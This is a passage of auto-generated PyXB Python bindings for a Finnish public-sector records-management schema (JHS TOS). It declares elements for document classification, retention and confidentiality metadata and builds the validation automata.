__AsiakirjaluokkaTarkenneTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'AsiakirjaluokkaTarkenneTeksti'), 'AsiakirjaluokkaTarkenneTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115AsiakirjaluokkaTarkenneTeksti', False, None, )
AsiakirjaluokkaTarkenneTeksti = property(__AsiakirjaluokkaTarkenneTeksti.value, __AsiakirjaluokkaTarkenneTeksti.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Laajennos uses Python identifier Laajennos
__Laajennos = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), 'Laajennos', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115Laajennos', True, None, )
Laajennos = property(__Laajennos.value, __Laajennos.set, None, 'Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.')
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Asiasanat uses Python identifier Asiasanat
__Asiasanat = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Asiasanat'), 'Asiasanat', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115Asiasanat', True, None, )
Asiasanat = property(__Asiasanat.value, __Asiasanat.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Kasittelysaannot uses Python identifier Kasittelysaannot
__Kasittelysaannot = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Kasittelysaannot'), 'Kasittelysaannot', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115Kasittelysaannot', False, None, )
Kasittelysaannot = property(__Kasittelysaannot.value, __Kasittelysaannot.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Kayttorajoitustiedot uses Python identifier Kayttorajoitustiedot
__Kayttorajoitustiedot = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Kayttorajoitustiedot'), 'Kayttorajoitustiedot', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115Kayttorajoitustiedot', False, None, )
Kayttorajoitustiedot = property(__Kayttorajoitustiedot.value, __Kayttorajoitustiedot.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Sailytysaikatiedot uses Python identifier Sailytysaikatiedot
__Sailytysaikatiedot = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Sailytysaikatiedot'), 'Sailytysaikatiedot', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115Sailytysaikatiedot', False, None, )
Sailytysaikatiedot = property(__Sailytysaikatiedot.value, __Sailytysaikatiedot.set, None, None)
# Attribute {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}id uses Python identifier id
__id = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'id'), 'id', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115id', _module_typeBindings.idTyyppi, required=True)
__id._DeclarationLocation = None
__id._UseLocation = None
id = property(__id.value, __id.set, None, None)
_ElementMap.update({
__AsiakirjaluokkaTeksti.name() : __AsiakirjaluokkaTeksti,
__OrganisaatioNimi.name() : __OrganisaatioNimi,
__TietojarjestelmaNimi.name() : __TietojarjestelmaNimi,
__LaatijaNimi.name() : __LaatijaNimi,
__LaadittuPvm.name() : __LaadittuPvm,
__MuokkaajaNimi.name() : __MuokkaajaNimi,
__MuokattuPvm.name() : __MuokattuPvm,
__HyvaksyjaNimi.name() : __HyvaksyjaNimi,
__HyvaksyttyPvm.name() : __HyvaksyttyPvm,
__VoimassaoloAlkaaPvm.name() : __VoimassaoloAlkaaPvm,
__VoimassaoloPaattyyPvm.name() : __VoimassaoloPaattyyPvm,
__PaatietoryhmatTeksti.name() : __PaatietoryhmatTeksti,
__AsiakirjaluokkaTarkenneTeksti.name() : __AsiakirjaluokkaTarkenneTeksti,
__Laajennos.name() : __Laajennos,
__Asiasanat.name() : __Asiasanat,
__Kasittelysaannot.name() : __Kasittelysaannot,
__Kayttorajoitustiedot.name() : __Kayttorajoitustiedot,
__Sailytysaikatiedot.name() : __Sailytysaikatiedot
})
_AttributeMap.update({
__id.name() : __id
})
_module_typeBindings.asiakirjatietoTyyppi = asiakirjatietoTyyppi
Namespace.addCategoryObject('typeBinding', 'asiakirjatietoTyyppi', asiakirjatietoTyyppi)
OrganisaatioNimi = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'OrganisaatioNimi'), pyxb.binding.datatypes.string, location=None)
Namespace.addCategoryObject('elementBinding', OrganisaatioNimi.name().localName(), OrganisaatioNimi)
TietojarjestelmaNimi = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TietojarjestelmaNimi'), pyxb.binding.datatypes.string, location=None)
Namespace.addCategoryObject('elementBinding', TietojarjestelmaNimi.name().localName(), TietojarjestelmaNimi)
AsiasanastoTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'AsiasanastoTeksti'), pyxb.binding.datatypes.string, location=None)
Namespace.addCategoryObject('elementBinding', AsiasanastoTeksti.name().localName(), AsiasanastoTeksti)
AsiasanaTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'AsiasanaTeksti'), pyxb.binding.datatypes.string, location=None)
Namespace.addCategoryObject('elementBinding', AsiasanaTeksti.name().localName(), AsiasanaTeksti)
PaatietoryhmatTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'PaatietoryhmatTeksti'), pyxb.binding.datatypes.string, location=None)
Namespace.addCategoryObject('elementBinding', PaatietoryhmatTeksti.name().localName(), PaatietoryhmatTeksti)
KokoavanProsessitunnuksenLahdeTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'KokoavanProsessitunnuksenLahdeTeksti'), pyxb.binding.datatypes.string, location=None)
Namespace.addCategoryObject('elementBinding', KokoavanProsessitunnuksenLahdeTeksti.name().localName(), KokoavanProsessitunnuksenLahdeTeksti)
AsiakirjaluokkaTarkenneTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'AsiakirjaluokkaTarkenneTeksti'), pyxb.binding.datatypes.string, location=None)
Namespace.addCategoryObject('elementBinding', AsiakirjaluokkaTarkenneTeksti.name().localName(), AsiakirjaluokkaTarkenneTeksti)
JulkisuusluokkaMuutosTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'JulkisuusluokkaMuutosTeksti'), pyxb.binding.datatypes.string, documentation='Esimerkiksi: Asian päättäminen, Päätöksenteko (toimenpide), Päätöksen allekirjoitus (toimenpide).', location=None)
Namespace.addCategoryObject('elementBinding', JulkisuusluokkaMuutosTeksti.name().localName(), JulkisuusluokkaMuutosTeksti)
AiempienVersioidenPoistoTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'AiempienVersioidenPoistoTeksti'), pyxb.binding.datatypes.string, documentation='Suositeltavat: Asian ratkaisu, Tietty aika asian ratkaisusta, Asiakirjan hävittäminen.', location=None)
Namespace.addCategoryObject('elementBinding', AiempienVersioidenPoistoTeksti.name().localName(), AiempienVersioidenPoistoTeksti)
TallennuspaikkaTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TallennuspaikkaTeksti'), pyxb.binding.datatypes.string, location=None)
Namespace.addCategoryObject('elementBinding', TallennuspaikkaTeksti.name().localName(), TallennuspaikkaTeksti)
SailytyspaikkaTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SailytyspaikkaTeksti'), pyxb.binding.datatypes.string, location=None)
Namespace.addCategoryObject('elementBinding', SailytyspaikkaTeksti.name().localName(), SailytyspaikkaTeksti)
TilaKoodi = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TilaKoodi'), tilaKoodiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', TilaKoodi.name().localName(), TilaKoodi)
TosVersio = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TosVersio'), versioTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', TosVersio.name().localName(), TosVersio)
OsaVersio = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'OsaVersio'), versioTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', OsaVersio.name().localName(), OsaVersio)
Luokitustunnus = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Luokitustunnus'), luokitustunnusTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', Luokitustunnus.name().localName(), Luokitustunnus)
NimekeTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'NimekeTeksti'), nimekeTekstiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', NimekeTeksti.name().localName(), NimekeTeksti)
ToimenpiteenKuvausTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ToimenpiteenKuvausTeksti'), kuvausTekstiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', ToimenpiteenKuvausTeksti.name().localName(), ToimenpiteenKuvausTeksti)
LuokitusKuvausTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'LuokitusKuvausTeksti'), kuvausTekstiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', LuokitusKuvausTeksti.name().localName(), LuokitusKuvausTeksti)
KuvausTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'KuvausTeksti'), kuvausTekstiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', KuvausTeksti.name().localName(), KuvausTeksti)
LisatiedotTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'LisatiedotTeksti'), lisatiedotTekstiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', LisatiedotTeksti.name().localName(), LisatiedotTeksti)
JulkisuusluokkaKoodi = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'JulkisuusluokkaKoodi'), julkisuusluokkaKoodiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', JulkisuusluokkaKoodi.name().localName(), JulkisuusluokkaKoodi)
SalassapitoAikaArvo = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SalassapitoAikaArvo'), salassapitoAikaArvoTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', SalassapitoAikaArvo.name().localName(), SalassapitoAikaArvo)
SalassapitoPerusteTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SalassapitoPerusteTeksti'), salassapitoPerusteTekstiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', SalassapitoPerusteTeksti.name().localName(), SalassapitoPerusteTeksti)
SalassapidonLaskentaperusteTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SalassapidonLaskentaperusteTeksti'), salassapidonLaskentaperusteTekstiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', SalassapidonLaskentaperusteTeksti.name().localName(), SalassapidonLaskentaperusteTeksti)
SuojaustasoKoodi = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SuojaustasoKoodi'), suojaustasoKoodiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', SuojaustasoKoodi.name().localName(), SuojaustasoKoodi)
TurvallisuusluokkaKoodi = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TurvallisuusluokkaKoodi'), turvallisuusluokkaKoodiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', TurvallisuusluokkaKoodi.name().localName(), TurvallisuusluokkaKoodi)
HenkilotietoluonneKoodi = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'HenkilotietoluonneKoodi'), henkilotietoluonneKoodiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', HenkilotietoluonneKoodi.name().localName(), HenkilotietoluonneKoodi)
SailytysajanPituusArvo = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SailytysajanPituusArvo'), sailytysajanPituusArvoTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', SailytysajanPituusArvo.name().localName(), SailytysajanPituusArvo)
SailytysajanPerusteTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SailytysajanPerusteTeksti'), sailytysajanPerusteTekstiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', SailytysajanPerusteTeksti.name().localName(), SailytysajanPerusteTeksti)
SailytysajanLaskentaperusteTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SailytysajanLaskentaperusteTeksti'), sailytysajanLaskentaperusteTekstiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', SailytysajanLaskentaperusteTeksti.name().localName(), SailytysajanLaskentaperusteTeksti)
ToimenpideluokkaTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ToimenpideluokkaTeksti'), toimenpideluokkaTekstiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', ToimenpideluokkaTeksti.name().localName(), ToimenpideluokkaTeksti)
ToimenpideluokkaTarkenneTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ToimenpideluokkaTarkenneTeksti'), toimenpideluokkaTarkenneTekstiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', ToimenpideluokkaTarkenneTeksti.name().localName(), ToimenpideluokkaTarkenneTeksti)
AsiakirjaluokkaTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'AsiakirjaluokkaTeksti'), asiakirjaLuokkaTekstiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', AsiakirjaluokkaTeksti.name().localName(), AsiakirjaluokkaTeksti)
KasittelyprosessinTilaTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'KasittelyprosessinTilaTeksti'), kasittelyprosessinTilaTekstiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', KasittelyprosessinTilaTeksti.name().localName(), KasittelyprosessinTilaTeksti)
LaatijaNimi = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'LaatijaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', LaatijaNimi.name().localName(), LaatijaNimi)
LaadittuPvm = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'LaadittuPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', LaadittuPvm.name().localName(), LaadittuPvm)
MuokkaajaNimi = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'MuokkaajaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', MuokkaajaNimi.name().localName(), MuokkaajaNimi)
MuokattuPvm = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'MuokattuPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', MuokattuPvm.name().localName(), MuokattuPvm)
HyvaksyjaNimi = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyjaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', HyvaksyjaNimi.name().localName(), HyvaksyjaNimi)
HyvaksyttyPvm = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyttyPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', HyvaksyttyPvm.name().localName(), HyvaksyttyPvm)
VoimassaoloAlkaaPvm = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloAlkaaPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', VoimassaoloAlkaaPvm.name().localName(), VoimassaoloAlkaaPvm)
VoimassaoloPaattyyPvm = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloPaattyyPvm'), _ImportedBinding_metarecord_binding__jhs.LoppuPvmTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', VoimassaoloPaattyyPvm.name().localName(), VoimassaoloPaattyyPvm)
YhteyshenkiloNimi = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'YhteyshenkiloNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', YhteyshenkiloNimi.name().localName(), YhteyshenkiloNimi)
ProsessinOmistajaNimi = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ProsessinOmistajaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', ProsessinOmistajaNimi.name().localName(), ProsessinOmistajaNimi)
Tos = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Tos'), CTD_ANON, location=None)
Namespace.addCategoryObject('elementBinding', Tos.name().localName(), Tos)
Laajennos = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), CTD_ANON_, documentation='Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.', location=None)
Namespace.addCategoryObject('elementBinding', Laajennos.name().localName(), Laajennos)
Nimeke = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Nimeke'), nimekeTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', Nimeke.name().localName(), Nimeke)
Asiasanat = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Asiasanat'), asiasanatTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', Asiasanat.name().localName(), Asiasanat)
Kasittelysaannot = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Kasittelysaannot'), kasittelysaannotTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', Kasittelysaannot.name().localName(), Kasittelysaannot)
Kayttorajoitustiedot = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Kayttorajoitustiedot'), kayttorajoitusTiedotTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', Kayttorajoitustiedot.name().localName(), Kayttorajoitustiedot)
Sailytysaikatiedot = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Sailytysaikatiedot'), sailytysaikaTiedotTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', Sailytysaikatiedot.name().localName(), Sailytysaikatiedot)
TosTiedot = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TosTiedot'), TosTiedotTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', TosTiedot.name().localName(), TosTiedot)
Luokka = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Luokka'), luokkaTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', Luokka.name().localName(), Luokka)
NimekeKielella = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'NimekeKielella'), nimekeKielellaTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', NimekeKielella.name().localName(), NimekeKielella)
KasittelyprosessiTiedot = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'KasittelyprosessiTiedot'), kasittelyprosessiTiedotTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', KasittelyprosessiTiedot.name().localName(), KasittelyprosessiTiedot)
Toimenpidetiedot = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Toimenpidetiedot'), toimenpidetiedotTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', Toimenpidetiedot.name().localName(), Toimenpidetiedot)
Asiakirjatieto = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Asiakirjatieto'), asiakirjatietoTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', Asiakirjatieto.name().localName(), Asiakirjatieto)
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TosTiedot'), TosTiedotTyyppi, scope=CTD_ANON, location=None))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Luokka'), luokkaTyyppi, scope=CTD_ANON, location=None))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), CTD_ANON_, scope=CTD_ANON, documentation='Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.', location=None))
def _BuildAutomaton ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton
del _BuildAutomaton
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=None)
counters.add(cc_0)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'TosTiedot')), None)
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Luokka')), None)
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Laajennos')), None)
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
transitions.append(fac.Transition(st_2, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
st_2._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON._Automaton = _BuildAutomaton()
def _BuildAutomaton_ ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_
del _BuildAutomaton_
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.WildcardUse(pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_skip, namespace_constraint=pyxb.binding.content.Wildcard.NC_any), None)
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_._Automaton = _BuildAutomaton_()
nimekeTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'NimekeTeksti'), nimekeTekstiTyyppi, scope=nimekeTyyppi, location=None))
nimekeTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'NimekeKielella'), nimekeKielellaTyyppi, scope=nimekeTyyppi, location=None))
def _BuildAutomaton_2 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_2
del _BuildAutomaton_2
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(nimekeTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'NimekeKielella')), None)
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
symbol = pyxb.binding.content.ElementUse(nimekeTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'NimekeTeksti')), None)
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
transitions = []
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
nimekeTyyppi._Automaton = _BuildAutomaton_2()
asiasanatTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'AsiasanastoTeksti'), pyxb.binding.datatypes.string, scope=asiasanatTyyppi, location=None))
asiasanatTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'AsiasanaTeksti'), pyxb.binding.datatypes.string, scope=asiasanatTyyppi, location=None))
def _BuildAutomaton_3 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_3
del _BuildAutomaton_3
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=None)
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=None)
counters.add(cc_1)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(asiasanatTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'AsiasanastoTeksti')), None)
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(asiasanatTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'AsiasanaTeksti')), None)
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
asiasanatTyyppi._Automaton = _BuildAutomaton_3()
kasittelysaannotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'JulkisuusluokkaMuutosTeksti'), pyxb.binding.datatypes.string, scope=kasittelysaannotTyyppi, documentation='Esimerkiksi: Asian päättäminen, Päätöksenteko (toimenpide), Päätöksen allekirjoitus (toimenpide).', location=None))
kasittelysaannotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'AiempienVersioidenPoistoTeksti'), pyxb.binding.datatypes.string, scope=kasittelysaannotTyyppi, documentation='Suositeltavat: Asian ratkaisu, Tietty aika asian ratkaisusta, Asiakirjan hävittäminen.', location=None))
kasittelysaannotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TallennuspaikkaTeksti'), pyxb.binding.datatypes.string, scope=kasittelysaannotTyyppi, location=None))
kasittelysaannotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SailytyspaikkaTeksti'), pyxb.binding.datatypes.string, scope=kasittelysaannotTyyppi, location=None))
kasittelysaannotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), CTD_ANON_, scope=kasittelysaannotTyyppi, documentation='Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.', location=None))
def _BuildAutomaton_4 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_4
del _BuildAutomaton_4
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=None, metadata=None)
counters.add(cc_4)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(kasittelysaannotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'JulkisuusluokkaMuutosTeksti')), None)
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(kasittelysaannotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'AiempienVersioidenPoistoTeksti')), None)
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(kasittelysaannotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'TallennuspaikkaTeksti')), None)
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(kasittelysaannotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'SailytyspaikkaTeksti')), None)
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
